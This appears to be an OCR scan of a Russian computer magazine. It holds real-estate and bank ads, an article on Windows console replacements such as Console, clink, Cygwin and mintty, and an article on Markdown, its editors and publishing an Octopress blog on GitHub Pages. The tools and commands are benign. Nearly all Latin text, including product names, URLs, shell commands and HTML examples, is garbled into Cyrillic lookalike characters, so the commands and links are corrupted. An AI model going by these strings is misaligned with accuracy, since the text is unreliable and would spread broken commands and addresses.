камера за пределами корпуса — вот ее главные особенности. Если учесть, что сейчас 
Арріе постепенно скрещивает Мае 05 и І05, то управление Мае 05 при помощи пальцев 
скоро снова может стать реальностью. 
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монолит 



плюс 



ИПОТЕКА 

«Монолит плюс» активно работает с веду- 
щими банками по программам ипотечного 
кредитования. Особое внимание уделяется 
правовой защищенности клиентов, приоб- 
ретателей жилья и нежилых помещений. 



МИКРОРАЙОН №4 ГОРОДА КОРОЛЕВА - ЭТО ПЯТЬ НОВЫХ 
СОВРЕМЕННЫХ МНОГОЭТАЖНЫХ ЗДАНИЙ С ПОДЗЕМНЫМИ 
АВТОСТОЯНКАМИ. ОБЩАЯ ПЛОЩАДЬ ДОМОВ - 140 000 КВ.М., 
ПЕРВЫЕ ЭТАЖИ БУДУТ ОТВЕДЕНЫ ДЛЯ ОБЪЕКТОВ СОЦИАЛЬНО - 
БЫТОВОГО НАЗНАЧЕНИЯ: МАГАЗИНЫ, АПТЕКИ, ПРЕДПРИЯТИЯ 
БЫТА, МЕДИЦИНСКИЕ УЧРЕЖДЕНИЯ. 
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ДОПОЛНИТЕЛЬНУЮ ИНФОРМАЦИЮ О ПРОДАЖЕ КВАРТИР В ЖК «НА ВЫСОТЕ» 
МОЖНО ПОЛУЧИТЬ В ОФИСЕ ПРОДАЖ КОМПАНИИ «МОНОЛИТ ПЛЮС» 



Реклама 






















КОМПАНИЯ «МОНОЛИТ ПЛЮС» (ВХОДИТ В СОСТАВ 
ГРУППЫ КОМПАНИЙ «МОНОЛИТ») ПРЕДСТАВЛЯЕТ 
ЖИЛОЙ КОМПЛЕКС «НА ВЫСОТЕ», РАСПОЛОЖЕННЫЙ 
ПРАКТИЧЕСКИ В ЦЕНТРАЛЬНОЙ ЧАСТИ ГОРОДА 
КОРОЛЕВА - МКР.4 В ГРАНИЦАХ УЛ. МАТРОСОВА, 

УЛ. СТРОИТЕЛЕЙ, УЛ. ДЕКАБРИСТОВ. 



С подробными схемами 
планировок квартир и 
проектной декларацией 
можно ознакомиться на 
сайте ѵѵѵѵѵѵ.ак-топоіііги 




Микрорайон №4 - географический центр г. Королёва. 
Строительство домов ведётся по индивидуальному 
проекту. В шаговой доступности от данного адреса 
находится гипермаркеты и супермаркеты известных 
брендов (Перекрёсток, Ковчег и т.д.), а так же 
предприятия сфер услуг, досуговые центры 
(кафе, рестораны), и центральный Дом культуры. 



Уже давно Королев имеет 
славу города, где можно по- 
лучить очень качественное 
образование: обилие специа- 
лизированных школ, творче- 
ских центров и школ искусств, 
богатые фонды библиотек, 
известные Вузы в черте 
города - все это определяет 
атмосферу научной сосре- 
доточенности и творчества 
горожан. 



Добраться до города и жилого комплекса «На высоте» можно от м. ВДНХ на маршрутном такси 
№ 392 или с Ярославского вокзала на пригородной электричке до ст. Болшево. Время в пути на 
скоростной электричке «Спутник» до станции метро «Комсомольская» занимает всего 25 минут. 




МОСКОВСКАЯ ОБЛАСТЬ, Г КОРОЛЕВ, 
ПРОЕЗД МАКАРЕНКО, Д. 1 



( 495 ) 516 - 40-04 
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Мария «МіЕгіІІ» Нефедова (тіЕгіІІЙгеаІ.Хс 
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С^СТО-йккИС- сррды, , . „ 

ПЫК гуооыікг ЕІіПДК Ли'кСНЫ-П 



: Орга-и передан псдостѵппа. 

: Щ.ііП Г 1 .кпН . к' II 



АПГРЕЙДЫ ДЛЯ СМО.ЕХЕ И АЛЬТЕРНАТИВЫ 

Будем честны — стандартная командная строка ѴѴіпсІоѵѵз неудобна. В ней нет нормального сору-разіе, 
нет вкладок и даже нет возможности по-человечески поменять размер окна. Кроме того, в самой 
ѴѴіпсІоѵѵз маловато консольных инструментов, и любители текстового режима, возможно, захотят 
получить доступ к мощному окружению ІІІМІХ. Для этого тоже есть свои решения. 
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Жизнь в консоли ѴѴіпсІоѵѵз 



м 



ісгозоН не сильно заботит судьба командной строки. Оно и 
понятно: для большинства людей это совершенно бесполез- 
ная часть системы. К счастью, есть энтузиасты, не поле- 



нившиеся превратить стандатный стсі.ехе в инструмент, который 
действительно можно использовать. 



СОИЗОЬЕ 

зоигсеіюгде.пеі/ргоіесіз/сопзоіе 

Сперва рассмотрим решения для тех, кто выживает под командной 
строкой ѴѴіпсІоѵѵз, но при этом не испытывает нужды связываться 
с виртуализацией или *піх-утилитами, а главное — не желает пла- 
тить! Словом, начнем с самого простого и доступного. 

Проекте незамысловатым названием Сопзоіе, пожалуй, самая 
крутая и функциональная разработка для оптимизации стсі в 
ѴѴіпсІоѵѵз на данный момент. В отличие от родной оболочки систе- 
мы, Сопзоіе призвана быть удобной, понятной и предусматривает 
все те мелочи, которых многим так не хватает, например, после 
работы с Ып их или Мае. 

Нагляднее всего будет просто перечислить ключевые фишки 
софтины: 

• Можно создавать множество вкладок командной строки в одном 
окне, синдикацией активности фоновой вкладки. 

• Можно на лету изменять размер окна, какхочется,текстбудет 
автоматически подгоняться под новый размер. 

• Имеется функция сору-разіе, а значит, можно спокойно копипа- 
стить информациютуда-сюда, как в обычном текстовом редак- 
торе (выделить мышью нужный фрагмент можно, зажав клавишу 
<5ЫЙ>,а вставить — черезтулбар или через меню). 

• Естьвозможностьвыбиратьлюбой из доступныхдля консоли 
шрифтов и настроить их сглаживание вплоть до СІеагТуре. 

• Можно запоминать размер окна и позицию на экране — при 
каждомзапуске конфигурация будетта, что нужна пользователю. 
Прозрачностьокнатакже имеется и настраивается, нореализо- 
вана странно — во многих случаях текст становится нечитаемым. 

• Работаютвсевозможные комбинации клавиш, которые можно 
настроитьподсебя. 

• Можносоздаватьпреднастроенныевкладки и прописывать ком- 
бинации команд, которые будут выполнены при открытии данной 
вкладки. 

• Естьвозможностьподключениядругихинтерпретаторов (ЬазЬ и 
прочие) — а значит, и запускать сценарии на этих языках. 

Разумеется, это далеко не полный перечень того, что умеет 
Сопзоіе, но остальные нюансы лучше познавать на деле, тем более 
что программа распространяется свободно и совершенно бес- 



МОЖНО СОЗДАВАТЬ ПРЕД- 
НАСТРОЕННЫЕ ВКЛАДКИ И 
ПРОПИСЫВАТЬ КОМБИНАЦИИ 
КОМАНД, КОТОРЫЕ БУДУТ ВЫ- 
ПОЛНЕНЫ ПРИ ИХ ОТКРЫТИИ 



платно. Заметим, что, поработав с Сопзоіе хотя бы раз, уже сложно 
представить себе работу без нее. К сожалению, некоторые пользо- 
ватели жалуются на скорость работы программы. 

Кстати, для тех, кто больше доверяет платным и серьезным 
решениям, есть очень похожая на Сопзоіе альтернатива — 
РоѵѵегСтсІ ( роѵѵегстсі.сот ). По функциональности Сопзоіе и 
РоѵѵегСтсІ схожи, только у последней различных «свистелок» и 
удобств еще больше: 

• Сильная сторона — возможностьрасполагатьконсоли нетолько 
в виде вкладок, но и в виде областей одного экрана. При этом 
можно разместить до четырех терм и налов. 

• Можно вести логи вводимых команд, искать по ним. 

• Можно запоминать пути и папки в виде избранного с занесением в 
избранныезакладки. 

• Предусмотрены различные настройки интерфейса: меняется фон, 
изменяются шрифты, нумеруются строки. 

• Поддерживается автодополнение. 

• Доступна подсветка синтаксиса. 

• Есть возможность за поминать активные сессии. 

Однозначно оправдать ценник в 30 долларов у РоѵѵегСтсІ я не 
могу — при желании Сопзоіе можно расширить до нужного уровня, 
да и упирается все в конечном счете в конкретные потребности 
пользователя. 



сиык 

сосіе.доодіе.сот/р/сііпк 

К самым простым апгрейдам можно отнести еще один совсем 
маленький ха к — 0 реп Зои гее утилиту сііпк, которая способна 
значительно расширить возможности интерпретатора команд- 
ной строки стсі.ехе. Дело в том, что сііпк использует библиотеку 




Сопзоіе — бесплатная и продуманная до мелочей альтернатива родной консоли 



По сравнению с Сопзоіе, РоѵѵегСтсІ имеет множество дополнительных плюшек 
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РС20ЫЕ 



геасіііпе, которая создана и поддерживается в рамках проекта 
6І\Ш и обеспечивает интерфейс командной строки и обработку 
строк в ЬазЬ. 

После установки сііпк интерпретатор стсі.ехе фактически 
ведет себя как командная оболочка ЬазЬ со всеми ее продвину- 
тыми функциями: автодополнением командной строки, редакти- 
рованием, историей команд и так далее. Перечислять весь список 
новых возможностей стсі не стану, приведу только некоторые 
особенности: 

• удобноеавтодополнение путей (нажатием <ТАВ>); 

• вставка из буфера обмена (по стандартномухоткею: <СігІ>-Ѵ); 

• поддержкаавтодополнения приуказании исполняемыхфайлов/ 
команд и переменныхокружения; 

• функции ІЫо/РесІо (<СігІ>-_ или <СігІ>-Х, <СігІ>-ІІ); 

• улучшенная история командной строки; 

• сохранение предыдущихсессий; 

• поискпоистории (<СігІ>-Ри<СігІ>-5); 

• расширенная история (например, !!, !<зІгіпд<и !$); 

• скрипты автодополнения на І_иа, позволяющиесерьезносэконо- 
митьвремя. 

СѴбѴѴІЫ 

сѵаѵѵіп.сот 

Ну и в заключение хотелось бы напомнить тебе о еще одном 
полезнейшем инструменте, хотя его и нельзя назвать «простой 
оптимизацией стсі». Данное решение пригодится тем, кто желает 
объединить возможности 1_іпих и ѴѴіпсІоѵѵз, или тем, кто по каким- 
то причинам не может установить І_іпих на своем компе, но в нем 
нуждается. 

Конечно, большинство наших читателей уже догадались, о чем 
речь, ведь они наверняка знакомы со старым добрым Судѵѵіп, но 
вспомнить о нем еще раз — не лишнее. 

Судѵѵіп — это ІІІЧІХ-подобная среда и интерфейс командной 
строки для ѴѴіпсІоѵѵз, позволяющая объединить ѴѴіпсІоѵѵз и ІІІЧІХ 
без использования виртуализации (что немаловажно). По сути, 
это не что иное, как набор утилит из мира *піх, портированных на 
ѴѴіпсІоѵѵз. Что конкретно устанавливать помимо базовой системы, 
каждый решает сам для себя — выбор огромен. Но так как мы се- 
годня занимаемся оптимизацией командной строки, нас интересу- 
ет именно этот аспект Судѵѵіп. 

В общем-то, Судѵѵіп превращает командную строку в удобный 
ІІІЧІХ-терминал, к какому привыкли поклонники І_іпих и Мае. 

Все ІІІЧІХ-команды, которые тебе знакомы, прекрасным образом 
будут работать и здесь, также, как работают и многие никсо- 
вые утилиты. Однако сама командная оболочка, увы, остается 
практически без изменений. Судѵѵіп решает проблему отсутствия 
команд и синтаксиса, но удобство работы все равно оставляет 
желать лучшего. Следующий совет поможет разобраться и с этой 
задачей. 



МІІМТТѴ 

собе.доодіе.сот/р/тіпиѵ 

Если ты используешь Судѵѵіп или М5ѴЗ/М іпЗѴѴ, тебе точно при- 
годится тіпиу. 

Как мы уже выяснили, чаще всего людям в работе с командной 
строкой не хватает самого элементарного: удобного выделения 



СѴ6ѴѴІЫ ПРЕВРАЩАЕТ КОМАНД- 
НУЮ СТРОКУ В УДОБНЫЙ ІЖІХ- 
ТЕРМИНАЛ, К КАКОМУ ПРИВЫК- 
ЛИ поклонники ыішх и мас 




Судѵѵіп с запущенным хсіоск и МісіпідЫ Соттапсіег 




тіпНу —удобная надстройка 



текста, функции сору-разіе, настроек прозрачности окна и так 
далее. А значит, нужна новая программа -терм и нал. Міпиу — одно 
из самых популярных и удобных решений в этой области. 

МіпПу, так же как и Сопзоіе, о которой речь шла в начале, при- 
звана оптимизировать работу командной строки. Функциональ- 
ность этих двух софтин весьма схожа, правда, тіпиу, к сожалению, 
не поддерживаеттабы. Если же наличие или отсутствие вкладок 
некритично, на тіпиу точно стоит обратить внимание, потому что 
она предоставляет: 

• удобный сору-разі; 

• функцию бгад & сігор для текста, файлов или директорий; 

• возможностьоткрыватьссылки по<Сігі>+клик; 

• полноэкранный режим и прозрачностьдля ѴѴіпсІоѵѵз Ѵізіа и 7; 

• поддержкуразличныхкодировок, включая ІЛ Р-8, 
а также многое, многое другое. П-Г 
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на правах рекламы 




Іогіу & депНетап 

СГТѴ 
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Оформить дебетовую или кредитную «Мужскую карту» 
можно на сайте ѵѵѵѵѵѵ.аІ^аЬапк.ги или позвонив 
по телефонам: 

8 (49$) 788-88-78 в Москве 

8 800-2000 000 в регионах России [звонок бесплатный) 



ДО 30 СЕНТЯБРЯ 

всем держателям «Мужской карты» 
ПРЕДОСТАВЛЯЕТСЯ 1 0% СКИДКА 

НА НОВУЮ КОЛЛЕКЦИЮ В СЕТИ МАГАЗИНОВ 
ІАОѴ&б Е МТЦЕМ АЛіСІ ТУ* 



ПОДРОБНОСТИ НА 

ѵѵѵѵѵѵ.тапсагсІ.ги 






А Альфа 'Банк (дате)Іапй 







ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 05.03.2012 №1326" 





РС20ЫЕ 



Антон Жуков (апІіЫегйдтаіІ.сот) 




Знакомься. 

Эю Магксіоѵѵп 



ИСПОЛЬЗУЕМ ХАКЕРСКИЙ ЯЗЫК 
РАЗМЕТКИ ДЛЯ САМЫХ РАЗНЫХ ЗАДАЧ 



Пожалуй, главным открытием за последнее 
время для меня стала не какая-то новая 
технология или новый удобный сервис, а... язык 
разметки. Казалось бы, что здесь может быть 
примечательного? Только если речь идет не 
о Магксіоѵѵп. Простая идея, как можно оформить 
текст и превратить его в валидный НТМІ_, 
выстрелила настолько, что использовать его 
можно практически повсеместно. А благодаря 
популярности Магксіоѵѵп в хакерских кругах, 
появился еще и совершенно новый подход 
(и сервисы) к публикации контента, в основе 
которого лежат статические файлы. 



МАРКООѴѴЫ? ЧТО ЭТО? 

Легче всего смысл Магксіоѵѵп объяснить на простейшем примере. 
Для составления списка дел я использую обычный текстовый 
файл, в котором пишу: 

Список дел: 

- написать статью о Магксіоып 

- сделать иллюстрации 

- отправить в редакцию 

Каждый из нас умеет оформлять сложные структуры в про- 
стом ріаіп ІехЛе, и в этом основной смысл Магксіоѵѵп. Например, 
приведенный текст можно сразу сконвертировать в НТМІ_, при этом 
интерпретатор Магксіоѵѵп (скажем, реализованный в виде плагина 
к текстовому редактору вроде ЗиЫітеТехІ или І\ІоІерасІ++) сам рас- 
познает, что имеет дело с ненумерованным списком: 

<р>Список дел:</р> 
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Знакомься. Это Магксіоѵѵп 








Заголовок 



ЛіЦІШІАйаіИ 









" т " ^* т '*™ п| 

чи'-ыы ■ -іи -п— «г. ьлл ч ія *ч> ■ 

і уь гу^ ііігі^іл^ц^4»^н.яи ^ і , 1 іні №4імм г 



Заголйшак 



Возможно, самый функциональный редактор для ѴѴіпсіоѵѵб 



Бесплатный и удобный инструмент для создания веб-документов в Мае 05 X 



<и1> 

<1і>написать статью про МапксІоып</1і> 

<1і>сделать иллюстраиии</1і> 

<1і>отправить текст в редакцию</1і> 

</и1> 

Как пишет сам автор Магксіоѵѵп Джон Грубер, идея языка в том, 
чтобы синтаксис был настолько прост, компактен и очевиден, что 
размеченный документ оставался бы полностью читаемым и непо- 
священный человек мог бы даже решить, что перед ним обычный 
ріаіп Іехі. Как Магксіоѵѵп добивается такого результата? 

Возьмем чуть более сложный пример. Представь, что тебе нуж- 
но оформить нумерованный список. Очевидно, что ты поставишь 
перед каждым пунктом соответствующий номер. Нужно акцен- 
тировать внимание на какие-то слова? Ты наверняка сделал это 
с помощью каких-то символов. 

# Заголовок 
## Подзаголовок 



В этом абзаце нужно: 



1. что-то выделить **жирным** и *курсивом* 

2. поставить ссылку на сайт автора - [йагіп§ РігеЬаІІ] 
(Іі1:1:р://сІагіп§бпеЬа11. пеѣ) 

5. процитировать код, например. 1 ргіпі: "Неііо. ыогіеі!" 

3. и вста вить портрет ав тора 



ДДжон Г рубер] (61:1: р: /ДсІагіп§бгеЬа11. пе1:/§парІііс 5/а иііііоп/ 
асІсІІ50П-Ьы-425 ор§) 

В этом примере хорошо видно, насколько читабельным остается 
текст. Фактически очевидного решения не придумали только для 
вставки ссылок и картинок, плюс изначально язык не позволял 
определить масштаб изображения. В результате обработки интер- 
претатором на выходе мы получаем готовый код: 



<61>Заголовок</61> 

<б2>Подзаголовок</б2> 

<р>В этом абзаце нужно: </р> 

<о1> 

<1і>что-то выделить <5І:гоп§>жирным</5І:поп§> 
и <ет>курсивом</етх/1і> 

<1і>поставить ссылку на сайт автора - <а 6ге-р="61:1:р \Ц 
сІагіп§бгеЬа11. пе^'^Оагіп^ РігеЬа11</ах/1і> 
<1і>проиитировать код, например. <сос!е>ргіп1: "Неііо. 
ѵюгіеі ! *'</сосІех/1і> 



<1і>и вставить портрет автора</1і> 

< / о!> 

<рхіш§ 5гс="61:1:р: //сІагіп^бгеЬаІІ. пе1:/§гар6іс5/аи1:6ог/ 

асІсІІ50п-Ьы-425.зр§Да11:= ,, Джон Грубер" Ш1е="" /></р> 

По сути дела, ты уже знаешь синтаксис Магксіоѵѵп — все прочие 
нюансы за пять минут осваиваются чтением официального мануала 

( сІагіпдЛгеЬаІІ.пеі/ргоіесіз/тагксІоѵѵп/зупІах ). 



НА ФИГА КОЗЕ БАЯН? 

О'кей, язык разметки действительно очень простой и понятный. Но 
где это можно использовать? Зачем это нужно? Набившая оскомину 
аббревиатура ѴѴѴ5ІѴѴѴ6 давно доказала свою несостоятельность 
среди продвинутых пользователей. Мы пробовали использовать 
визуальный подход при оформлении материалов на хакер.ги. 
и это был тихий ужас. ѴѴѴЗІѴѴѴб-редакторы, даже очень хорошие, 
работают криво и в случае сложной верстки начинают безбожно 
глючить. Многие сложные вещи невозможно было сделать в прин- 
ципе. Не использовать же НТМІ_ в чистом виде (хотя чего греха 
таить, иногда мы так и делаем)? Та же самая ѴѴікіресІіа с самого 
начала своего существования предлагала специально разрабо- 
танную ѵѵікі-разметку. А любой мало-мальски толковый форумный 
движок поддерживает ЬЬсосІе или что-то похожее. Проблема одна: 
разметка используется, но везде разная. Магксіоѵѵп же сразу мно- 
гим пришелся по вкусу, в результате чего его взяли на вооружение 
многие популярные ресурсы. Бесспорно, намного удобней писать 
комментарий в форуме, используя разметку Магксіоѵѵп, нежели 
чистый НТМІ_, в тегах которого легко запутаться. Именно поэтому 
сервисы ІіітЫг и розіегоиз поддерживают такой режим ведения 
блога. Также поддерживают Магкбоѵѵп-разметку многие СМ5: 
йгираі, РІопе, РасііапіСМЗ — и фреймворки: 0)апдо (требуется 
установка руіЬоп-тагксіоѵѵп), РиЬу оп Раііз (требуется установка 
ВІиеСІоіЬ, Магики). 

Поддержка синтаксиса есть в любом уважающем себя тек- 
стовом редакторе, а опцию для быстрого предпросмотра легко 
подключить в виде плагинов. К тому же есть немало специали- 
зированных редакторов, изначально заточенных для работы 
с Магксіоѵѵп (ты можешь выбрать подходящий, прочитав отдельную 
врезку). А интерпретаторы для обработки языка разметки реализо- 
ваны на любом языке, поэтому, будь твой проект на РуіЬоп, РНР, 
РиЬу и чем-либо еще, — везде ты сможешь предложить пользо- 
вателям Магксіоѵѵп. Дальше — больше. Магксіоѵѵп стал настолько 
популярен, что лег в основу многих сервисов. К примеру, набираю- 
щий обороты стартап зегіріодг.аіті позволяет превратить статиче- 
ские файлы, оформленные на Магксіоѵѵп и выложенные в йгорЬох, 
в красивый блог (с возможностью подключения любого домена). 
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РС20ЫЕ 



Подхваченная идея быстро эволюционировала в кругах гиков 
и выросла в создание таких движков, как Осіоргезз ( осіоргезз.огд ). 

МАРКБОѴѴМ И ВЕБ 

Осіоргезз — это, как заявляют разработчики, хакерский фрейм- 
ворк для блогинга. По сути, это генератор статического блога, 
который парсит файлы на Магксіоѵѵп, и выдает на выходе набор 
НТМЕек, которые и будут являться нашим блогом. Но есть один ги- 
ковский нюанс — в качестве площадки для размещения файлов по 
умолчанию предлагается использовать бііНиЬ (еще более гиковый 
вариант — использовать для этого облачное хранилище файлов 
Атагоп 53)! Напомню, дШіиЬ.сот не только позволяет бесплатно 
размещать репозитории кода, но еще предоставляет бесплатную 
платформу для создания блога к каждому из проектов ( радев. 
дШіиЬ.сот ). Изначально это было нужно, чтобы делать странички 
для проектов, а мы сделаем целый блог. 

Будем считать, что учетка на бііНиЬ у нас уже есть, — если 
нет, то это вопрос тридцати секунд. Первым делом необходимо 
создать репозиторий, в котором будут храниться исходники блога. 
Репозиторию необходимо дать имя следующего вида: ивегпате. 
дШиіЬ.сот (позже можно прикрутить сторонний домен). После чего 
потребуется установить на своей машине Осіоргевв ( осіоргевв.огд ). 

В общем виде работа с блогом будет выглядеть так: ставим на 
локальную машину Осіоргевв, пишем посты в МагМоѵѵп-файлики, 
правим шаблон (если надо), выполняем в консоли команду для 
генерации контента и, наконец, заливаем полученный НТМІ_ + 35 
в наш репозиторий на бііНиЬ. Ну а теперь по порядку. 

1. Первым пунктом идет установка Осіоргезз 2.0. Для его работы 
необходим установленный РиЬу 1.9.2. Кроме этого, должен 
быть еще установлен біі. Для начала скачиваем исходники 
Осіоргезз, подготавливаем их и устанавливаем: 

^І1= сіопе ^і1=://^і1=ІіиЬ.сот/іта1=ІіІ5/ос1=орпе55.^і1= 

[оиг_Ыо§_То1сІег] 

ссі [оиг Ыое -Роісіегі 




Очень неплохое решение для Ыпих, хоть и без альтернатив 

^ет і пзііаі і Ьипісіег 
ЬипсІІе іпзііаіі 

2. Затем устанавливаем стандартную тему Осіоргезз. 

гаке іпз'ЬаІІ. 



3. Далее следует настроить Осіоргезз на работу с нашим репози- 
торием: 

гаке 5е1:ир_§і1:ІіиЬ_ра§е5 

4. В процессе выполнения задачи нас попросят ввести ІІКІ_ наше 
го репозитория. В принципе, после этого можно уже публико- 
ваться. Делается это одной командой: 



РЕДАКТОРЫ ДЛЯ РАБОТЫ С МАРКйОѴѴЫ 





То, что Магксіоѵѵп может 




ѴѴШ00ѴѴ5 




І-Ш11Х 




1 


упростить жизнь, — 
несомненно. Но чтобы 


2 


МагксІоѵѵпРасі (ЬіІ.Іѵ/ 
эЗЬисіб] — один из наи- 


3 


Пользователям данной 
ОС не так повез- 


4 



МАС 

Рекомендую обратить 
внимание на бесплат- 



использовать его продуктив- 
но, нужно работать с софтом, 
который его поддерживает. 
Спешу обрадовать: привычные 
редакторы вроде 5иЫітеТехІ, 
ТехІМаІе, Ѵіт и Етасз, которы- 
ми ты наверняка пользуешься, 
отлично ладят с Магксіоѵѵп, 
если их этому научить с по- 
мощью плагинов. Для ЗиЫіте 
это 5иЫітеІехІ-тагксіоѵѵп- 
ргеѵіеѵѵ ( ЬіІ.Іу/ѵѵсіРѴѴо4 ) 
и 5иЫітеМагксіоѵѵпВиіІс1 
( ЬіІ.Іѵ/ІІК64і ). для ТехІМаІе 
— Магксіоѵѵп.ІтЬипсіІе ( Ьіі. 
Іѵ/М87ѵѵЕ5 ). для Ѵіт — Ѵіт- 
тагксіоѵѵп ( ЬіІ.Іѵ/ѵОІкКЛ 
и Ѵіт-тагксіоѵѵп-ргеѵіеѵѵ ( ЬіІ.Іѵ/ 
МІРЗіх), а для Етасз — Етасз 
Магксіоѵѵп Мосіе ( ЬИ.Іѵ/ЬМдСО ). 
Или можно заюзать специализи- 
рованные редакторы. 



более популярных редакто- 
ров под ѴѴіпсіоѵѵз для работы 
с Магксіоѵѵп-документами. 
Мегаполезной фичей является 
мгновенный предпросмотр (І_іѵе 
Ргеѵіеѵѵ) — как только ты что-то 
меняешь в тексте, в правой 
части окна мгновенно приме- 
няются внесенные изменения. 
Имеется поддержка горячих 
клавиш, возможность изменить 
таблицу стилей С55 непосред- 
ственно внутри приложения. 
Более простой и элегантный ин- 
струмент— ѴѴгіІеМопкеу ( Ьіі.іу/ 
ІІтІѴх ). Он менее функционален, 
но благодаря полноэкранному 
режиму и возможности фокуса 
на конкретном участке текста 
(клавиша Р6) более удобен 
для писателей и блоггеров. 



л о — из специализированных 
решений можно посоветовать 
только РеТехІ [ ЬіІ.Іѵ/Рз7дТК ). 

Как и в МагксІоѵѵпРасі, тут есть 
«живой» предпросмотр, а также 
функция экспорта в боодіе Босз 
и форматы НТМІ_, РБР и (ЮТ. 

С другой стороны, можно вос- 
пользоваться популярными 
редакторами беапу ( Дѵ/4С(ВІ ) 
и Каіе ( ЬМ:.Іѵ/1 5ІПІР ) — но это про- 
сто универсальные инструменты 
для работы с кодом, поддер- 
живающие Магксіоѵѵп. Поэтому 
такой вариант больше подойдет 
веб-девам. В обоих случаях есть 
подсветка синтаксиса, автома- 
тическая подстановка заверша- 
ющих тегов НТМІ_/ХМІ_, простой 
менеджер проектов, свертыва- 
ние кода, большое количество 
кодировок. 



ный редактор Мои ( ЬіІ.Іѵ/г471бз ). 
Он поддерживает подсветку 
синтаксиса, предпросмотр в ре- 
альном времени, полноэкранный 
режим, автосохранение, ин- 
крементальный поиск, экспорт 
в НТМІ_, пользовательские темы, 
пользовательские С55-стили, 
используемые для предвари- 
тельного просмотра. 

Очень функциональным решени- 
ем является также платный ре- 
дактор МиІІіМагксІоѵѵп Сотрозег 
( ЬіІ.Іѵ/РІіРдК ) — от создателя 
диалекта МиІІіМагксІоѵѵп. Здесь 
из коробки доступны всякие 
вкусности вроде таблиц и вы- 
вода в различные форматы. 
Правда, есть у программы и один 
минус — за нее придется вы- 
ложить 9,99 долларов. 
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Знакомься. Это Магксіоѵѵп 




Очень функциональное решение для твоего уютного бложика 



гаке §еп_бер1оу 

или двумя: 

гаке ^епегаііе 
гаке сіеріоу 

Можно до сіеріоу выполнить еще гаке ргеѵіеѵѵ, в результате чего 
запустится локальный веб-сервер на адресе Мір://0. 0.0. 0:4000, 
где можно посмотреть, что же нагенерировал Осіоргезз. Если 
необходимо что-то подправить в конфигурации, то нужно об- 
ратиться к файлу _сопПд.ут1. 

4. Теперь пришло время создания первого поста: 

гаке пеѵ^роз’Ц" Название поста" ] 

В папке зоигсе/_ро5Із/ появится файлик с текущей датой и за- 
головком поста, в формате Магксіоѵѵп. Берем любой понравив- 
шийся Магкбоѵѵп-редактор, редактируем файл и публикуем 
пост: 

?І1= асісі . 

соттіі: -т "Іпііііаі роз!:" 
ризіі огі^іп зоигсе 
гаке §епега1:е 
гаке сіеріоу 

Все, можно переходить по адресу блога и проверять, как опу- 
бликовалась первая запись. Если нужно привязать свой блог к ка- 



стомному домену, то это легко сделать, воспользовавшись простои 
инструкцией ( ЬіІ.Іѵ/МѴѴд РЗЯ . На первый взгляд такой подход может 
показаться странным, но на самом деле он предельно удобен. Сайт 
работает очень быстро, потому что состоит из статических файлов 
и размещается на надежных площадках. Благодаря использова- 
нию бШЧиЬ любой может предложить свои изменения в посты — 
и ты легко можешь их применить. Сам Осіоргезз предлагает отлич- 
ный НТМІ_5-шаблон с массой плюшек вроде быстрого подключения 
внешней системы комментариев (например, Оізриз'а). Конечно, это 
история не про обычных людей, но мы о них и не говорим. 

МАРКйОѴѴМ: ЧТО ДАЛЬШЕ? 

Простая идея постоянно эволюционирует. Первая реализация, 
написанная Джоном Грубером, являлась обычным скриптом на 
РегІ. По мере того как новый язык разметки обретал популярность, 
появлялись новые реализации, написанные на С#, С, Соттоп І_ізр, 
НазкеІІ, баѵа, баѵаБсгірІ, І_иа, пеѵѵЫБР, РегІ, РНР, РуіЬоп, РиЬу, 

Бсаіа сторонними разработчиками, которые ориентировались на 
первую реализацию, ставшую своего рода стандартом. Помимо 
реализаций на разных языках программирования, появились еще 
приложения, расширяющие синтаксис Магксіоѵѵп дополнительной 
функциональностью, такие как МиШМагкбоѵѵп и рапбос. Диалек- 
ты Магксіоѵѵп позволяют работать с документами из множества 
файлов, автоматически делать таблицы, собирать библиографии, 
вставлять математику на МаіЬМІ_ и комбинировать код с другими 
языками верстки, включая БаТеХ, НТМІ_ и прочие. Расширенные 
диалекты умеют автоматизировать различные вещи, например 
проставлять правильную типографику. Кроме того, выводить мож- 
но не только в НТМІ_, но и в РОЕ, РТР, (ЮТ и даже тап-страницы 
(люди, хоть раз видевшие синтаксис языка ІгоіТ, оценят]. Все это 
позволяет использовать Магксіоѵѵп в самых разных целях: писать 
документацию, книги и целые сайты. 

Популярность этого изящного синтаксиса разметки набирает 
обороты по всему миру. Честно сказать, Магксіоѵѵп как наркотик — 
попробовав один раз написать пост на нем, ты вряд ли вернешься 
к обычному НТМІ_. Использовав Магксіоѵѵп при написании этой ста- 
тьи, я могу не только преобразовать ее в РОЕ, но и без лишних тру- 
дозатрат опубликовать на сайте. А редакция, подсев на Магксіоѵѵп, 
уже всерьез задумалась о разработке простых скриптов, чтобы 
конвертировать текст в файл верстки используемой в издатель- 
стве программы ІпОезідп. Я этому не удивляюсь. ПС 



ДРУГИЕ ГЕНЕРАТОРЫ СТАТИЧЕСКИХ САЙТОВ 



Надо сказать, что Ос*орге55 не единственный инструмент для 
генерации статического контента. Хотелось бы остановить 
твое внимание еще на двух инструментах: Рооіе ( ЬііЬискеБ 
огд/оЬепзоппе/рооІе ) и ВІаіеВІоддег ( Ыаге.Ыаскепеб.сг ). 

Рооіе — генератор статических сайтов, использующий 
Магксіоѵѵп. Он написан на РуПіоп и для работы ничего, кроме 
него, не требует. Работать с ним очень легко: ты создаешь 
содержимое веб-страниц с помощью Магксіоѵѵп — и Рооіе 
превращает их в простой и красивый сайт с навигационным 
меню. Принцип работы несложен: программа берет файлы 
из директории іпрЩ и копирует их в директорию оиІриБ 
при этом все файлы с расширением т б, ткб, тбоѵѵп или 
тагкбоѵѵп конвертируются в НТМІ_ с раде.МтІ в качестве 
каркаса. Если ты хочешь заменить внешний вид сайта, то 
необходимо будет подредактировать файлы раде.МтІ и іп- 
риі/рооіе.сзз. Чтобы обновить, изменить, добавить контент, 
необходимо выполнить: 



> рооіе. ру --Ьиііб 

После чего Рооіе заново сгенерируеттвой сайт. 

Еще один инструмент для создания статического 
сайта — ВІагеВІоддег. Для своей работы он не требует ни 
баз данных, ни выполнения скриптов на стороне сервера. 
Все, что нужно, — это установленный РегІ-интерпретатор. 
Для создания контента также используется Магкбоѵѵп, так 
что ты можешь создавать свой блог в любом понравившемся 
Магкбоѵѵп-редакторе. К основным возможностям относятся: 
создание валидных НТМІ_ 4.01 или ХНТМБ 1.1 страниц и В55 
2.0 фидов; генерация помесячных и погодовых архивов, 
поддержка тегов. Инструмент позволяет создавать как 
блогпосты, так и просто страницы, позволяет быстро 
поменять тему, СББ-стили или локализацию. Подробную 
